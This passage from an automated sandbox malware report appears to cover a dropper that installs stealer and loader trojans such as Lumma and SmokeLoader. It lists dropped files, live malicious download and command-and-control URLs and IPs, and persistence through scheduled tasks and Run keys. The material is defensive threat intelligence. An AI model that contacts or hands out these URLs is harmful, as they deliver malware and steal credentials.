                      C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe79%ReversingLabsWin32.Trojan.LummaStealer
                      C:\Users\user\AppData\Local\Temp\4312.exe38%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\5A89.exe88%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\6056.exe54%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\6374.exe91%ReversingLabsWin32.Trojan.Pitou
                      C:\Users\user\AppData\Local\Temp\6653.dll50%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\914D.exe92%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\BroomSetup.exe21%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\C338.exe100%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\EE8C.exe58%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\FourthX.exe92%ReversingLabsWin64.Packed.Generic
                      C:\Users\user\AppData\Local\Temp\InstallSetup4.exe63%ReversingLabsWin32.Trojan.Nemesis
                      C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_isdecmp.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_setup64.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\nsvA60A.tmp\INetC.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\egiibgt82%ReversingLabsWin32.Trojan.SmokeLoader

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://excel.office.comj0%URL Reputationsafe
                      https://powerpoint.office.comcember0%URL Reputationsafe
                      http://schemas.micro0%URL Reputationsafe
                      http://ns.adobe0%URL Reputationsafe
                      http://www.remobjects.com/ps0%URL Reputationsafe
                      https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
                      https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt20%Avira URL Cloudsafe
                      https://resergvearyinitiani.shop/api0%Avira URL Cloudsafe
                      http://5.42.64.33/ping.php?substr=four100%Avira URL Cloudmalware
                      http://goodfooggooftool.net/index.php0%Avira URL Cloudsafe
                      http://cbinr.com/forum/Plugins/cred64.dll100%Avira URL Cloudmalware
                      http://cbinr.com/forum/index.php?scr=1100%Avira URL Cloudmalware
                      http://vacantion18ffeu.cc/index.php0%Avira URL Cloudsafe
                      http://185.172.128.127/syncUpd.exe100%Avira URL Cloudmalware
                      http://valarioulinity1.net/index.php0%Avira URL Cloudsafe
                      http://cbinr.com/forum/Plugins/clip64.dll100%Avira URL Cloudmalware
                      http://sjyey.com/tmp/index.php100%Avira URL Cloudmalware
                      https://liabilityarrangemenyit.shop/api100%Avira URL Cloudmalware
                      https://claimconcessionrebe.shop/api100%Avira URL Cloudphishing
                      http://emgvod.com/emd/1.jpg100%Avira URL Cloudmalware
                      https://secretionsuitcasenioise.shop/api100%Avira URL Cloudmalware
                      https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
                      http://www.innosetup.com/0%Avira URL Cloudsafe
                      http://buriatiarutuhuob.net/index.php0%Avira URL Cloudsafe
                      http://185.172.128.19/288c47bbc1871b439df19ff4df68f0776.exe100%Avira URL Cloudmalware
                      https://gemcreedarticulateod.shop/api100%Avira URL Cloudphishing
                      http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re0%Avira URL Cloudsafe
                      http://185.172.128.90/cpa/ping.php?substr=four&s=ab100%Avira URL Cloudmalware
                      http://emgvod.com/uploads/logo3.jpg100%Avira URL Cloudphishing
                      https://sabotage.net0%Avira URL Cloudsafe
                      http://cassiosssionunu.me/index.php0%Avira URL Cloudsafe
                      http://asx.sunaviat.com/data/pdf/may.exe100%Avira URL Cloudmalware
                      https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
                      http://selebration17io.io/index.php100%Avira URL Cloudmalware
                      http://cbinr.com/forum/index.php100%Avira URL Cloudmalware
                      http://trmpc.com/check/index.php100%Avira URL Cloudmalware
                      http://bercekp.com/search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea9293320%Avira URL Cloudsafe
                      http://sulugilioiu19.net/index.php0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      resergvearyinitiani.shop
                      		172.67.217.100
                      		truefalse
                        		unknown
                        trmpc.com
                        		186.147.159.149
                        		truefalse
                          		unknown
                          liabilityarrangemenyit.shop
                          		104.21.83.220
                          		truefalse
                            		unknown
                            mmtplonline.com
                            		103.20.213.70
                            		truefalse
                              		high
                              secretionsuitcasenioise.shop
                              		104.21.16.152
                              		truefalse
                                		unknown
                                selebration17io.io
                                		91.215.85.120
                                		truetrue
                                  		unknown
                                  gemcreedarticulateod.shop
                                  		104.21.80.171
                                  		truetrue
                                    		unknown
                                    asx.sunaviat.com
                                    		172.67.221.35
                                    		truetrue
                                      		unknown
                                      emgvod.com
                                      		211.168.53.110
                                      		truefalse
                                        		unknown
                                        bercekp.com
                                        		185.196.8.22
                                        		truefalse
                                          		unknown
                                          sjyey.com
                                          		109.175.29.39
                                          		truefalse
                                            		unknown
                                            claimconcessionrebe.shop
                                            		104.21.58.31
                                            		truefalse
                                              		unknown
                                              tceducn.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                soetegem.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  arrunda.ru
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://cbinr.com/forum/Plugins/cred64.dlltrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://valarioulinity1.net/index.phptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://5.42.64.33/ping.php?substr=fourtrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://resergvearyinitiani.shop/apifalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://vacantion18ffeu.cc/index.phptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://185.172.128.127/syncUpd.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://cbinr.com/forum/index.php?scr=1true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://goodfooggooftool.net/index.phptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://sjyey.com/tmp/index.phpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://cbinr.com/forum/Plugins/clip64.dllfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://claimconcessionrebe.shop/apifalse
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    http://185.172.128.19/288c47bbc1871b439df19ff4df68f0776.exefalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://emgvod.com/emd/1.jpgfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://secretionsuitcasenioise.shop/apifalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://liabilityarrangemenyit.shop/apifalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://buriatiarutuhuob.net/index.phptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://gemcreedarticulateod.shop/apitrue
                                                    • Avira URL Cloud: phishing
                                                    		unknown
                                                    http://asx.sunaviat.com/data/pdf/may.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://mmtplonline.com/photo/1.jpgfalse
                                                      		high
                                                      http://185.172.128.90/cpa/ping.php?substr=four&s=abfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://emgvod.com/uploads/logo3.jpgfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://cassiosssionunu.me/index.phptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://selebration17io.io/index.phptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://cbinr.com/forum/index.phpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://trmpc.com/check/index.phpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://sulugilioiu19.net/index.phptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://bercekp.com/search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://excel.office.comjexplorer.exe, 00000002.00000000.1417868497.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.1417868497.000000000BEEE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.torproject.org/5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high
                                                        https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt25A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://schemas.microexplorer.exe, 00000002.00000000.1413491619.0000000007920000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1414735175.00000000084D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1416052037.00000000091E0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.openssl.org/support/faq.html5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://curl.se/docs/hsts.html5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://wns.windows.com/ilable1explorer.exe, 00000002.00000000.1417868497.000000000BE77000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.torproject.org/documentation.html5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://android.notify.windows.com/iOSed0JA/:explorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://android.notify.windows.com/iOSdexplorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://trac.torproject.org/projects/tor/ticket/14917.5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.innosetup.com/78A4.tmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.1415007841.0000000008D2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://word.office.comexplorer.exe, 00000002.00000000.1417868497.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://curl.se/docs/http-cookies.html5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re5A89.exe, 00000008.00000002.3833746976.0000000000824000.00000040.00000400.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://android.notify.windows.com/iOSu3explorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://ns.adobeexplorer.exe, 00000002.00000000.1412144633.0000000004627000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://curl.se/docs/alt-svc.html5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://outlook.comexplorer.exe, 00000002.00000000.1417868497.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppybbweexplorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://sabotage.net5A89.exe, 00000008.00000003.2943136260.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3061866756.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000002.3842626480.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2930706935.00000000037F9000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3065013325.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2926190165.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2926481054.0000000003555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1417868497.000000000BF55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://api.msn.com/explorer.exe, 00000002.00000000.1415007841.0000000008B3F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.remobjects.com/ps78A4.tmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://api.msn.com/%explorer.exe, 00000002.00000000.1415007841.0000000008B3F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.21.83.220
                                                                                      		liabilityarrangemenyit.shopUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      185.172.128.90
                                                                                      		unknownRussian Federation
                                                                                      		50916NADYMSS-ASRUfalse
                                                                                      194.126.174.190
                                                                                      		unknownNetherlands
                                                                                      		29802HVC-ASUSfalse
                                                                                      104.21.80.171
                                                                                      		gemcreedarticulateod.shopUnited States
                                                                                      		13335CLOUDFLARENETUStrue
                                                                                      211.168.53.110
                                                                                      		emgvod.comKorea Republic of
                                                                                      		3786LGDACOMLGDACOMCorporationKRfalse
                                                                                      192.121.44.26
                                                                                      		unknownSweden
                                                                                      		29518BREDBAND2SEfalse
                                                                                      186.147.159.149
                                                                                      		trmpc.comColombia
                                                                                      		10620TelmexColombiaSACOfalse
                                                                                      116.12.180.234
                                                                                      		unknownSingapore
                                                                                      		3758SINGNETSingNetSGfalse
                                                                                      104.21.16.152
                                                                                      		secretionsuitcasenioise.shopUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      95.216.154.139
                                                                                      		unknownGermany
                                                                                      		24940HETZNER-ASDEfalse
                                                                                      86.59.21.38
                                                                                      		unknownAustria
                                                                                      		8437UTA-ASATfalse
                                                                                      178.33.183.251
                                                                                      		unknownFrance
                                                                                      		16276OVHFRfalse
                                                                                      131.188.40.189
                                                                                      		unknownGermany
                                                                                      		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                                                      104.21.58.31
                                                                                      		claimconcessionrebe.shopUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      128.31.0.39
                                                                                      		unknownUnited States
                                                                                      		3MIT-GATEWAYSUSfalse
                                                                                      213.144.142.24
                                                                                      		unknownSwitzerland
                                                                                      		13030INIT7CHfalse
                                                                                      172.67.221.35
                                                                                      		asx.sunaviat.comUnited States
                                                                                      		13335CLOUDFLARENETUStrue
                                                                                      194.140.117.58
                                                                                      		unknownGermany
                                                                                      		41998NETCOMBW-ASDEfalse
                                                                                      103.20.213.70
                                                                                      		mmtplonline.comIndia
                                                                                      		17439NETMAGIC-APNetmagicDatacenterMumbaiINfalse
                                                                                      185.220.101.206
                                                                                      		unknownGermany
                                                                                      		208294ASMKNLfalse
                                                                                      185.172.128.127
                                                                                      		unknownRussian Federation
                                                                                      		50916NADYMSS-ASRUfalse
                                                                                      192.42.116.17
                                                                                      		unknownNetherlands
                                                                                      		1101IP-EEND-ASIP-EENDBVNLfalse
                                                                                      185.220.101.205
                                                                                      		unknownGermany
                                                                                      		208294ASMKNLfalse
                                                                                      189.232.12.90
                                                                                      		unknownMexico
                                                                                      		8151UninetSAdeCVMXfalse
                                                                                      199.58.81.140
                                                                                      		unknownCanada
                                                                                      		7765KOUMBITCAfalse
                                                                                      109.175.29.39
                                                                                      		sjyey.comBosnia and Herzegowina
                                                                                      		9146BIHNETBIHNETAutonomusSystemBAfalse
                                                                                      91.121.181.6
                                                                                      		unknownFrance
                                                                                      		16276OVHFRfalse
                                                                                      172.67.217.100
                                                                                      		resergvearyinitiani.shopUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      91.215.85.120
                                                                                      		selebration17io.ioRussian Federation
                                                                                      		34665PINDC-ASRUtrue
                                                                                      185.172.128.19
                                                                                      		unknownRussian Federation
                                                                                      		50916NADYMSS-ASRUfalse
                                                                                      163.172.182.26
                                                                                      		unknownUnited Kingdom
                                                                                      		12876OnlineSASFRfalse
                                                                                      5.9.43.211
                                                                                      		unknownGermany
                                                                                      		24940HETZNER-ASDEfalse
                                                                                      185.196.8.22
                                                                                      		bercekp.comSwitzerland
                                                                                      		34888SIMPLECARRER2ITfalse
                                                                                      5.42.64.33
                                                                                      		unknownRussian Federation
                                                                                      		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse

                                                                                      Private

                                                                                      IP
                                                                                      127.0.0.1

                                                                                      General Information

                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                      Analysis ID:1389372
                                                                                      Start date and time:2024-02-08 19:07:13 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 15m 19s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:49
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:IIBXMzS0zN.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:f35c060b3ac3b38cff5fc9131e794f93.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.expl.evad.mine.winEXE@158/176@26/35
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 90%
                                                                                      HCA Information:Failed
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, consent.exe, SIHClient.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 40.126.28.18, 40.126.28.12, 40.126.7.35, 40.126.28.11, 40.126.28.13, 40.126.28.22, 40.126.28.23, 40.126.28.20, 20.189.173.20, 20.42.73.29, 52.168.117.173, 104.208.16.94, 13.89.179.12, 20.189.173.21
                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, t.me, www.tm.lg.prod.aadmsa.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, anfesq.com, cbinr.com, onedsblobprdcus17.centralus.cloudapp.azure.com, pastebin.com, xmr-eu1.nanopool.org, xmr-eu2.nanopool.org, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, watson.events.data.microsoft.com, ocsp.digicert.com, login.live.com, blobcollectorcommon.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, rimakc.ru, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                      • Execution Graph export aborted for target 6056.exe, PID 7620 because there are no executed function
                                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • VT rate limit hit for: IIBXMzS0zN.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      19:08:32API Interceptor64805x Sleep call for process: explorer.exe modified
                                                                                      19:08:39Task SchedulerRun new task: Firefox Default Browser Agent 66B25F75DEF88C77 path: C:\Users\user\AppData\Roaming\egiibgt
                                                                                      19:08:47API Interceptor1x Sleep call for process: 6056.exe modified
                                                                                      19:08:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
                                                                                      19:08:55API Interceptor1x Sleep call for process: 6374.exe modified
                                                                                      19:08:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CSRSS "C:\ProgramData\Drivers\csrss.exe"
                                                                                      19:09:02API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                      19:09:03API Interceptor6x Sleep call for process: 288c47bbc1871b439df19ff4df68f076.exe modified
                                                                                      19:09:11Task SchedulerRun new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
                                                                                      19:09:13API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                      19:09:26API Interceptor6918x Sleep call for process: 5A89.exe modified
                                                                                      19:09:28Task SchedulerRun new task: Firefox Default Browser Agent D066E24F18B6A8CC path: C:\Users\user\AppData\Roaming\ejiibgt
                                                                                      19:09:32API Interceptor6602x Sleep call for process: anyburnfree.exe modified
                                                                                      19:09:41API Interceptor7371x Sleep call for process: csrss.exe modified
                                                                                      19:10:21Task SchedulerRun new task: Utsysc.exe path: C:\Users\user\AppData\Local\Temp\68fd3d7ade\Utsysc.exe
                                                                                      19:12:10API Interceptor1x Sleep call for process: svchost.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.21.83.220L2OyId5r9o.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                        Ud2oyUzB4d.exeGet hashmaliciousLummaCBrowse
                                                                                          38QTCIw4QJ.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                            x32g2473zx.exeGet hashmaliciousLummaCBrowse
                                                                                              ZJUNJ0W3mU.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                Oa5MQwNPBq.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                  7zofNQYPqw.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.17762.9680.exeGet hashmaliciousLummaC, Amadey, Fabookie, Glupteba, PureLog Stealer, RedLine, StealcBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                        MdO7pWHaxQ.exeGet hashmaliciousLummaC, Amadey, Fabookie, Glupteba, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                          185.172.128.90ZJUNJ0W3mU.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=four&s=ab
                                                                                                          file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=four&s=ab
                                                                                                          file.exeGet hashmaliciousGCleanerBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=one&s=two
                                                                                                          SecuriteInfo.com.Win32.PWSX-gen.17762.9680.exeGet hashmaliciousLummaC, Amadey, Fabookie, Glupteba, PureLog Stealer, RedLine, StealcBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=nine&s=ab&sub=0
                                                                                                          MdO7pWHaxQ.exeGet hashmaliciousLummaC, Amadey, Fabookie, Glupteba, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=nine&s=ab&sub=0
                                                                                                          YoECnoo0ah.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=nine&s=ab&sub=0
                                                                                                          7abf5ad882fd72332b0b7fb530c8c6505852d4f7ea39edfe444218bdcd9c7f0e_dump.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=four&s=ab
                                                                                                          file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=four&s=ab
                                                                                                          VtTzu63V0u.exeGet hashmaliciousAmadey, Fabookie, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, StealcBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=nine&s=ab&sub=0
                                                                                                          yKKgjKBq5T.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          • 185.172.128.90/cpa/ping.php?substr=four&s=ab
                                                                                                          104.21.80.171Ud2oyUzB4d.exeGet hashmaliciousLummaCBrowse
                                                                                                            HwcNz3KnuZ.exeGet hashmaliciousLummaCBrowse
                                                                                                              jevnnwIJ5Q.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                742BWJCCj5.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                                  38QTCIw4QJ.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                                                    x32g2473zx.exeGet hashmaliciousLummaCBrowse
                                                                                                                      SecuriteInfo.com.Trojan.WinGo.Agent.18060.25685.exeGet hashmaliciousLummaCBrowse
                                                                                                                        lENGBij84L.exeGet hashmaliciousLummaC, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                          ZJUNJ0W3mU.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                            file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse

                                                                                                                              Domains

